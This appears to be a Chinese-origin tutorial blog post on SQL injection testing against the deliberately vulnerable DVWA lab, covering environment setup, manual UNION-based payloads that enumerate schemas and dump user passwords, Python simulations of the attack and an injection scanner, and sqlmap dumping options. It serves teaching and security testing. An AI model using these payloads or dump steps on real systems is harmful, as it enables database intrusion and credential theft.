Technology Sharing

【Test Development】--Security Penetration Test

2024-07-12


1. Security Penetration

1.1 Classification

  • Web database security (SQL injection)
  • Web application server security (file upload vulnerabilities, file inclusion vulnerabilities)
  • Web client security (XSS, cross-site scripting)

2. SQL injection

2.1 Introduction to SQL injection

  • SQL injection has sat at or near the top of the OWASP Top 10 for years (Injection was A1 in the 2017 list and A03 in 2021)
  • A SQL injection attack happens when input parameters are not validated or escaped but are spliced directly into a SQL statement
  • The attacker places SQL code in the input; the server passes it to the database, which parses and executes it as part of the query

2.2 SQL injection principle

  • The attacker submits crafted input through the page
  • The server does not validate the submitted parameters, or validates them insufficiently
  • The input is spliced into the SQL statement, so the attacker can rewrite the query and read sensitive data from the database

2.3 SQL injection hazards

  • Database leak (the whole contents of the database can be read out)
  • Leaked user data is illegally bought and sold
  • The security of the web application is compromised (leaked credentials, for example, allow account takeover)

2.4 SQL injection implementation method

  • Manual
    • Find: the injection point
    • Input: commonly used injection payloads, entered one at a time
  • Automatic (tool)
    • Tool: scans for injection points
    • Input: the tool tries payload combinations automatically

3. Environment Construction

3.1 VMware virtual machine

3.1.1 Function

  • Virtual machine software: install several guest operating systems (Linux, Windows) on one physical machine
  • Both the target machine and the attacker machine run under VMware

3.2 Target machine (the vulnerable environment used for practice)

Purpose:

  • Runs the OWASP image that hosts the deliberately vulnerable DVWA application attacked in the sections below

3.3 Attacker machine (the environment used to launch SQL injection attacks)

Purpose:

  • Kali Linux contains hundreds of tools for information security tasks such as penetration testing and security research

4. Manual injection

4.1 Environmental Preparation

Description: practise manual injection against the target web application
Steps:

  • Start the OWASP target machine
  • Open the target machine's address in a browser
  • Open the OWASP-dvwa project
  • Log in
  • Select the SQL Injection page

4.2 Finding the injection point

Note: the probe character is the single quote ('), because the backend wraps the parameter in single quotes; a stray quote closes the string literal early.
Principle:

# SQL statement built by the backend
select first_name,last_name from users where user_id = '$id';
# Entering a single quote (') closes the string literal early and leaves an unbalanced quote; whatever follows the quote is parsed as SQL, so extra conditions can be appended
select first_name,last_name from users where user_id = ''';

With a lone single quote as the id the query fails with a syntax error, which confirms that the parameter is spliced into the statement unescaped: this is the injection point.

4.3 Logical OR

Close the quote, append an always-true condition such as or 1=1, and comment out the trailing quote with # (MySQL comment syntax). The WHERE condition is then true for every row and the page returns every user instead of one.

4.4 Guessing the number of columns

  1. Through UNION
' union select 1,2 #

A UNION only parses when both SELECTs have the same number of columns, so increase the count (1, then 1,2, and so on) until the error disappears; here two columns succeed, matching first_name and last_name in the original query.

  2. Through logical OR
' or 1=1 #

Returns every row; each row is displayed as two fields, which agrees with the column count found with UNION.

4.5 Get database, table, column

Get the database name

' union select 1,database()#

Get the tables

' union select table_name,1 from information_schema.tables where table_schema='dvwa' #

information_schema is MySQL's catalogue of databases, tables and columns; the schema name dvwa is the one returned by the previous step.

Get the columns

' union select column_name,1 from information_schema.columns where table_name='users' #

4.6 Get Data

# 1. Get a single field
' union select user,1 from users#

# 2. Get two fields
' union select user,password from users#

4.7 concat function

Function: concatenates several strings into one string
Syntax: concat(str1,str2,…)
Examples:

  • Get user_id, user and password from the users table, displayed in two columns
select user_id,concat(user,password) from dvwa.users;

  • Fix the problem that user and password run together by adding labels inside the concat
select user_id,concat('user:',user,' password:',password) from dvwa.users;

  • Get several fields through the injection point, which only displays two columns
' union select user,concat(first_name,' ',last_name,' ',password) from users#
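The manual chain of sections 4.2 through 4.7, as an added example that is not code from the original page or from DVWA. An in-memory SQLite table stands in for the target's MySQL database and each payload goes through the same string-spliced query that DVWA's low-security page builds. Three dialect differences are assumed and noted in comments: SQLite comments end the line with "-- " instead of MySQL's "#", sqlite_master plays the role of information_schema, and "||" replaces concat(). The rows and password hashes are constructed sample data.

```python
"""Manual SQL injection chain (sections 4.2-4.7) against a DVWA-style query.

Added example, not code from the original page or from DVWA.  An in-memory
SQLite table stands in for the target's MySQL database; the dialect
differences (comment marker, schema catalogue, string concatenation) are
noted inline.  All rows are constructed sample data.
"""
import sqlite3

# Constructed sample rows shaped like dvwa.users (hash values are made up).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "0123456789abcdef0123456789abcdef"),
    (2, "Gordon", "Brown", "gordonb", "fedcba9876543210fedcba9876543210"),
    (3, "Hack", "Me", "1337", "00112233445566778899aabbccddeeff"),
]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id: str):
    """The DVWA low-level pattern: the parameter is spliced straight into the SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id: str):
    """Parameterised form: the value is bound separately and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def run_manual_chain() -> dict:
    conn = build_db()
    out = {}

    # 4.2 Find the injection point: a lone quote unbalances the quoting -> syntax error.
    try:
        vulnerable_lookup(conn, "'")
        out["quote"] = "no error"
    except sqlite3.OperationalError as exc:
        out["quote"] = f"syntax error: {exc}"

    # 4.3 Logical OR: the always-true condition returns every row.
    # (SQLite's comment marker is "-- "; MySQL also accepts "#".)
    out["or"] = vulnerable_lookup(conn, "' OR 1=1 -- ")

    # 4.4 Column count: UNION only parses when both SELECTs have the same width.
    out["union2"] = vulnerable_lookup(conn, "' UNION SELECT 1,2 -- ")
    try:
        vulnerable_lookup(conn, "' UNION SELECT 1,2,3 -- ")
        out["union3"] = "no error"
    except sqlite3.OperationalError:
        out["union3"] = "column count mismatch"

    # 4.5 Enumerate tables: sqlite_master stands in for information_schema.tables.
    out["tables"] = vulnerable_lookup(
        conn, "' UNION SELECT name,1 FROM sqlite_master WHERE type='table' -- "
    )

    # 4.6/4.7 Dump credentials through the two displayed columns; "||" is SQLite's concat().
    out["creds"] = vulnerable_lookup(
        conn, "' UNION SELECT user, 'password:' || password FROM users -- "
    )

    # The same payload against the parameterised query is just an id that matches nothing.
    out["safe"] = safe_lookup(conn, "' OR 1=1 -- ")
    return out


if __name__ == "__main__":
    for step, result in run_manual_chain().items():
        print(f"{step}: {result}")
```

The last entry is the point of the fix: with a bound parameter the quote, the OR and the UNION are all just characters inside a value that matches no user_id, so no payload reaches the parser.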

5. Automatic injection

5.1 Introduction to automatic injection

Note: automatic injection uses a tool in place of the manual SQL injection steps above.
Tool: sqlmap

5.2 Automatic injection environment

  • Start the target machine
  • Start the attacker machine (Kali)

5.3 sqlmap

Tool: sqlmap

  • An open-source penetration testing tool
  • Automatically detects and exploits SQL injection vulnerabilities and can take over database servers

5.3.1 Basic usage of sqlmap

Parameters

  • -u: the target URL to scan
  • --batch: answer sqlmap's interactive prompts with the default choice automatically
  • --cookie: attach a cookie header to every request (needed when the page requires a login session)

Steps

  • Scan for injection points
  • Get the database name
  • Get the table names
  • Get the column names
  • Retrieve the data

Since the DVWA page requires a login, first copy the session cookie from the logged-in browser session and pass it with --cookie; without it sqlmap only ever sees the login page. Then scan the injection point with -u. On success sqlmap reports which parameter is injectable and which injection techniques worked.
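What the "scan for injection points" step automates, as an added example that is not sqlmap's code and not from the original page: a minimal probe in the style sqlmap uses (error-based, boolean-based and UNION column-count checks), run against a local string-spliced query so that it works offline. The simulated page, its MySQL-style error banner and its two sample rows are constructed; HTTP, cookies and --batch handling are left out. The same probe against a parameterised version of the page shows what a clean result looks like.

```python
"""A minimal injection-point scanner in the style sqlmap automates.

Added example, not sqlmap's code and not from the original page.  The
"page" is a local function over an in-memory SQLite table (constructed
sample data) instead of an HTTP request to DVWA.
"""
import sqlite3

_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT);"
    "INSERT INTO users VALUES (1,'admin','admin'),(2,'Gordon','Brown');"
)

# Constructed, MySQL-style wording so the probe has an error signature to look for.
ERROR_BANNER = "You have an error in your SQL syntax"


def _render(rows) -> str:
    return "\n".join(f"First name: {f}\nSurname: {l}" for f, l in rows)


def vulnerable_page(id_param: str) -> str:
    """Simulated DVWA low-security page: the id is spliced into the query."""
    try:
        rows = _conn.execute(
            f"SELECT first_name, last_name FROM users WHERE user_id = '{id_param}'"
        ).fetchall()
    except sqlite3.OperationalError as exc:
        return f"{ERROR_BANNER}: {exc}"
    return _render(rows)


def safe_page(id_param: str) -> str:
    """The same page with a parameterised query; the probe should find nothing."""
    rows = _conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (id_param,)
    ).fetchall()
    return _render(rows)


def probe(page, base_value: str, max_columns: int = 10) -> dict:
    """Run the three checks a scanner tries on one parameter and report the findings."""
    baseline = page(base_value)

    # 1. Error-based: a stray quote turns the page into a database error.
    error_based = ERROR_BANNER in page(base_value + "'")

    # 2. Boolean-based: an appended true condition leaves the page unchanged,
    #    an appended false condition changes it.
    true_page = page(f"{base_value}' AND '1'='1")
    false_page = page(f"{base_value}' AND '1'='2")
    boolean_based = true_page == baseline and false_page != baseline

    # 3. UNION column count: widen the SELECT until a marker value is reflected.
    #    ("-- " is SQLite's comment marker; MySQL also accepts "#".)
    marker = "7331"
    union_columns = None
    for n in range(1, max_columns + 1):
        cols = ",".join([marker] * n)
        if marker in page(f"{base_value}' UNION SELECT {cols} -- "):
            union_columns = n
            break

    return {
        "error_based": error_based,
        "boolean_based": boolean_based,
        "union_columns": union_columns,
        "injectable": error_based or boolean_based or union_columns is not None,
    }


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_page, "1"))
    print("safe:      ", probe(safe_page, "1"))
```

The boolean check is the one that still works when the application hides database errors, which is why tools keep it even when the error-based check fails; the marker in the UNION check is what lets the tool learn the column count without reading error text at all.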

5.3.2 sqlmap obtains the library name

--current-db: report the database currently used by the web application
-D: select the database that later options operate on

5.3.3 sqlmap obtains table

--tables: list all tables in the specified database (specify the database first with -D)
-T: select the table that later options operate on

5.3.4 sqlmap get column

--columns: list all columns in the specified table (specify the table first with -T)
-C: select the column(s) to operate on

5.3.5 sqlmap obtains data

--dump: dump the data from the selected database, table and columns (-D, -T and -C)